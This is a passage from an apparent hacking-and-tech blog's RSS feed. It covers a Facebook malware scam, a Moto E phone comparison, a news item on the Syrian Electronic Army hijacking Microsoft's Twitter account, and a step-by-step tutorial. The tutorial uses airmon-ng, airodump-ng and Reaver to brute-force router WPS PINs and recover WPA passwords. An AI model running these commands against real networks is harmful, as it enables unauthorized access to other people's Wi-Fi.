<div class="separator" style="clear: both; text-align: center;"><a style="margin-left: 1em; margin-right: 1em;" href="http://3.bp.blogspot.com/-BU7qY8mbmK8/U24Y8AKToDI/AAAAAAAAbkM/R8EPLYs7tsI/s1600/real-ghost-video.jpg"><img title="Real Ghost Caught on Tape! Facebook Scams Lure Users to Download Malware" src="http://3.bp.blogspot.com/-BU7qY8mbmK8/U24Y8AKToDI/AAAAAAAAbkM/R8EPLYs7tsI/s728/real-ghost-video.jpg" alt="Real Ghost Caught on Tape! Facebook Scams Lure Users to Download Malware" border="0" /></a></div>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">“<i>That concludes our spooky train ride through a mid-May haunted house of doom. Please keep your hands inside the cart until the gates have opened, and avoid clicking on fake Facebook videos at the gift counter</i>,” Christopher Boyd of Malwarebytes wrote.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">We have seen various suspicious posts on Facebook, like the recent “<i>Facebook Security Warning!!! Do this before your account gets deactivated!</i>” scam that threatens users with account deactivation if they don&#8217;t register it again, and &#8220;<i>See your Friend&#8217;s naked video</i>&#8220;, an app offering you a chance to see who has viewed your Facebook profile, and many more. Sometimes these scams are very obvious and easily avoidable, but many times they are irresistible and easy to fall for.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">So, if you are served with any such suspicious post or any other suspicious link, do not click on it, no matter it’s from your closest friend.</div>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/real-ghost-caught-on-camera-new-facebook-scams-lure-users-to-download-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Motorola Moto E exposes shortcomings of Samsung, Sony entry-level models</title>
		<link>http://hackingtech.in/motorola-moto-e-exposes-shortcomings-of-samsung-sony-entry-level-models/</link>
		<comments>http://hackingtech.in/motorola-moto-e-exposes-shortcomings-of-samsung-sony-entry-level-models/#respond</comments>
		<pubDate>Wed, 14 May 2014 10:19:36 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Tech News]]></category>
		<category><![CDATA[Motorola]]></category>
		<category><![CDATA[Nokia]]></category>
		<category><![CDATA[Samsung]]></category>
		<category><![CDATA[smartphones]]></category>
		<category><![CDATA[Sony]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1920</guid>
		<description><![CDATA[The launch of the Moto E smartphone at Rs 6,999 could radically change the smartphone market in India. As a brand Motorola threatens not just Micromax and Karbonn which are known for creating cheaper devices with top-end specs, but it will also pose a challenge to bigger smartphone brands such as Samsung, Sony and possibly &#8230; <a href="http://hackingtech.in/motorola-moto-e-exposes-shortcomings-of-samsung-sony-entry-level-models/" class="more-link">Continue reading <span class="screen-reader-text">Motorola Moto E exposes shortcomings of Samsung, Sony entry-level models</span></a>]]></description>
				<content:encoded><![CDATA[<p>The launch of the Moto E smartphone at Rs 6,999 could radically change the smartphone market in India. As a brand Motorola threatens not just Micromax and Karbonn which are known for creating cheaper devices with top-end specs, but it will also pose a challenge to bigger smartphone brands such as Samsung, Sony and possibly even Nokia, which has been trying to regain its place in the Indian market.</p>
<p>Mobile analysts everywhere have been spelling it out since the beginning of 2013: The age of high-end flagship smartphones is over and mid-range phones will drive the volume of sales. According to an IDC report in February 2014, “emerging markets have become the centre of attention when talking about present and future smartphone growth.”</p>
<p>The report notes that in a developing market like India, what will drive up smartphone sales are low-cost or budget phones. “Growth in the India market doesn’t rely on high-end devices like the iPhone, but in low-cost Android phones,” said Kiranjeet Kaur, a senior analyst for mobile phones at IDC Asia/Pacific.</p>
<p>And this is why the Moto E could be a big hit. In terms of specs, the device has a 4.3-inch screen with 960×540 pixel resolution with Gorilla Glass 3. It is the only smartphone offering such a high quality display at this price point. Compared to this the display of the Samsung Galaxy Star Pro, which is priced at Rs 6,110 has a resolution of 800×480 (WVGA) pixels.</p>
<p>The Moto E also comes with Android 4.4 KitKat in its stock form, with Motorola software in the form of apps. It has a dual-core processor clocked at 1.2 GHz and 1GB RAM, along with 4GB internal storage space and a microSD card slot. On the back is a 5 megapixel camera but there’s no front camera or LED flash, which is standard for this price point. It also has 3G support, Bluetooth 4.0, for low-powered connections.</p>
<p>&nbsp;</p>
<p><img class="aligncenter size-full wp-image-1921" src="http://hackingtech.in/wp-content/uploads/2014/05/Moto_E_NEW_NEW.jpg" alt="Moto_E_NEW_NEW" width="640" height="360" srcset="http://hackingtech.in/wp-content/uploads/2014/05/Moto_E_NEW_NEW.jpg 640w, http://hackingtech.in/wp-content/uploads/2014/05/Moto_E_NEW_NEW-300x168.jpg 300w" sizes="(max-width: 640px) 100vw, 640px" /></p>
<p>In comparison to this the Star Pro doesn’t have 3G, has a single-core processor and is still on Android Jelly Bean. The camera is a mere 2-megapixel unit. The RAM and total memory for the smartphone are not listed on Samsung’s website, but at least the former is unlikely to top the Moto E. For a user who wants specs but has a low-end budget the Moto E with its 1GB RAM, and 5-megapixel camera is the clear winner. And what helps is that Motorola, like Samsung, has good after-sales service.</p>
<p>For Samsung, as this IDC report notes, the Galaxy Star has been ”bringing in huge volumes at the low end,” and the Pro is supposed to be a better version of this.With the Moto E coming at such low-cost and offering great specs, that picture could change quickly.</p>
<p>Where Sony is concerned, the cheapest smartphone they have to offer is Sony Xperia E which is available in dual-SIM and single SIM versions. The smartphone, which is priced at around Rs 7,990 at online retailers, has 3.5 inch screen with 320×480 pixel resolution, 512 MB RAM, and a 3.15 primary VGA camera and no front camera. The single-SIM version of the phone is priced at Rs 6,895. This, too, pales in comparison to the Moto E.</p>
<p>The Moto E is a winner over both low-end Sony and Samsung smartphones. The other brand that should worry about the Moto E is Nokia, which had the third spot in smartphone sales in India, according to latest IDC data.</p>
<p>Nokia’s Android offering the Nokia X which was launched for Rs 8,599, but retails close to the Moto E’s price, again lags behind in terms of specs. While the 4-inch display and the 1GHz dual-core processor are close to the Moto E, the 512 MB RAM, and 3-megapixel rear camera come up short. This is even more unlikely to impress users given that the Android version on Nokia X is a forked-one with no access to the Google Play Store. Nokia has promised that users will be able to run most Android apps but the fact that there’s no official Google support could be a deal-breaker for many.</p>
<p>Something that’s rarely seen in the sub-Rs 8,000 bracket is the large battery of the Moto E. The 1980 mAh battery sounds aplenty given its non-demanding hardware. So on nearly all counts, the Moto E has the better of its rivals.</p>
<p>While specs and price are a big plus for Moto E, the one advantage that the competitors have is that the smartphone is only available on Flipkart. It’s not a phone that you are likely to see in your local mobile store shop, someplace where you can get a chance to handle the phone, which goes a long way in spreading brand awareness as well.</p>
<p>The problem is that the Moto E is restricted to users who are used to or know abfout online shopping. This significantly reduces the target audience for the phone.</p>
<p>Of course, the impact Moto E makes on the market will only be revealed once the first sales figures are out. For now, it’s safe to say that Moto E has a lot to offer in terms of brand and specs for those who don’t want to spend a bomb on their next (or possibly first) smartphone.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/motorola-moto-e-exposes-shortcomings-of-samsung-sony-entry-level-models/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to hack WPA2, WPA with Bazktrack 5 with Reaver!!</title>
		<link>http://hackingtech.in/hack-wpa2-wpa-bazktrack-5-reaver/</link>
		<comments>http://hackingtech.in/hack-wpa2-wpa-bazktrack-5-reaver/#respond</comments>
		<pubDate>Fri, 21 Feb 2014 18:16:51 +0000</pubDate>
		<dc:creator><![CDATA[hamzaali]]></dc:creator>
				<category><![CDATA[All About Exploits]]></category>
		<category><![CDATA[open terminal]]></category>
		<category><![CDATA[WPA]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1877</guid>
		<description><![CDATA[Read this article and try it! it&#8217;s works ! The first need to you is doenload backtrcak From this site : http://www.backtrack.org/ step 1: Boot into backtrack step 2:install reaver these are code to install reaver open terminal and type : apt-get update apt-get install reaver step 3:Find your wireless card open terminal and type &#8230; <a href="http://hackingtech.in/hack-wpa2-wpa-bazktrack-5-reaver/" class="more-link">Continue reading <span class="screen-reader-text">How to hack WPA2, WPA with Bazktrack 5 with Reaver!!</span></a>]]></description>
				<content:encoded><![CDATA[<p>Read this article and try it! it&#8217;s works !<br />
The first need to you is doenload backtrcak From this site : http://www.backtrack.org/</p>
<p>step 1: Boot into backtrack<br />
step 2:install reaver</p>
<p>these are code to install reaver</p>
<p>open terminal and type :</p>
<p>apt-get update</p>
<p>apt-get install reaver</p>
<p>step 3:Find your wireless card open terminal and type</p>
<p>iwconfig</p>
<p>hit enter</p>
<p>step 4: type airmon-ng start wlan0</p>
<p>step 5: type airodump-ng mon0</p>
<p>step 6: Crack the wpa password and open terminal and type and hit enter.</p>
<p>reaver -i moninterface -b bssid -vv</p>
<p>this code in my case will look like mine.</p>
<p>reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv</p>
<p>hit enter.</p>
<p>Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending.</p>
<p>How reaver works?</p>
<p>Now that you&#8217;ve seen how to use Reaver, let&#8217;s take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It&#8217;s a feature that exists on many routers, intended to provide an easy setup process, and it&#8217;s tied to a PIN that&#8217;s hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/hack-wpa2-wpa-bazktrack-5-reaver/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft&#8217;s Twitter News account hacked by Syrian Electronic Army</title>
		<link>http://hackingtech.in/microsofts-twitter-news-account-hacked-by-syrian-electronic-army/</link>
		<comments>http://hackingtech.in/microsofts-twitter-news-account-hacked-by-syrian-electronic-army/#respond</comments>
		<pubDate>Wed, 15 Jan 2014 05:36:30 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Hack News]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1884</guid>
		<description><![CDATA[Microsoft&#8217;s Twitter account was hacked by the Syrian Electronic Army just after the attacks on Xbox Twitter and Instagram, right as our calendars turned over to 2014. The Syrian Electronic Army hacked the Microsoft News Twitter account and posted a tweet stating that the company sells the user data to the government. &#8220;Don&#8217;t use Microsoft &#8230; <a href="http://hackingtech.in/microsofts-twitter-news-account-hacked-by-syrian-electronic-army/" class="more-link">Continue reading <span class="screen-reader-text">Microsoft&#8217;s Twitter News account hacked by Syrian Electronic Army</span></a>]]></description>
				<content:encoded><![CDATA[<p>Microsoft&#8217;s Twitter account was hacked by the Syrian Electronic Army just after the attacks on Xbox Twitter and Instagram, right as our calendars turned over to 2014. The Syrian Electronic Army hacked the Microsoft News Twitter account and posted a tweet stating that the company sells the user data to the government.</p>
<p>&#8220;Don&#8217;t use Microsoft emails(hotmail,outlook),They are monitoring your accounts and selling the data to the governments. #SEA @Official_SEA16,&#8221; the message read.</p>
<p><img class="aligncenter size-full wp-image-1885" alt="tweet 350" src="http://hackingtech.in/wp-content/uploads/2014/01/tweet-350.jpg" width="615" height="350" srcset="http://hackingtech.in/wp-content/uploads/2014/01/tweet-350.jpg 615w, http://hackingtech.in/wp-content/uploads/2014/01/tweet-350-300x170.jpg 300w" sizes="(max-width: 615px) 100vw, 615px" /></p>
<p>This is the second time that Microsoft&#8217;s accounts were hacked by the Syrian Electronic Army. It had hacked Microsoft&#8217;s Xbox Twitter account, Skype&#8217;s Twitter and Facebook accounts on New Year Eve&#8217;s. Microsoft, which owns Skype, had to issue a warning to discourage people from using Microsoft emails following the New Year&#8217;s Day hack.</p>
<p>After attacking Microsoft&#8217;s Twitter News account, The &#8220;Official Microsoft Blog,&#8221; blog was also hacked and displayed SEA messages, and redirected to the hacking group&#8217;s website for at least some users.</p>
<p>In response to the cyber attacks a Microsoft spokesperson stated, &#8220;Microsoft is aware of targeted cyber attacks that temporarily affected the Xbox Support and Microsoft News Twitter accounts. The accounts were quickly reset and we can confirm that no customer information was compromised.&#8221;</p>
<p><img class="aligncenter size-full wp-image-1886" alt="microsoft twitter hack(1)" src="http://hackingtech.in/wp-content/uploads/2014/01/microsoft-twitter-hack1.png" width="627" height="466" srcset="http://hackingtech.in/wp-content/uploads/2014/01/microsoft-twitter-hack1.png 627w, http://hackingtech.in/wp-content/uploads/2014/01/microsoft-twitter-hack1-300x222.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></p>
<p>Recently popular messaging Snapchat was hacked and more than 4.6 Million users id&#8217;s were leaked online. Snapchat has now released an updated version to prevent future attacks. The app now allows users to opt out of &#8216;Find Friends&#8217; feature that stores the usernames and phone numbers. The company has even set up an email address so white-hat hackers can use to notify the company of potential exploits: security@snapchat.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/microsofts-twitter-news-account-hacked-by-syrian-electronic-army/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
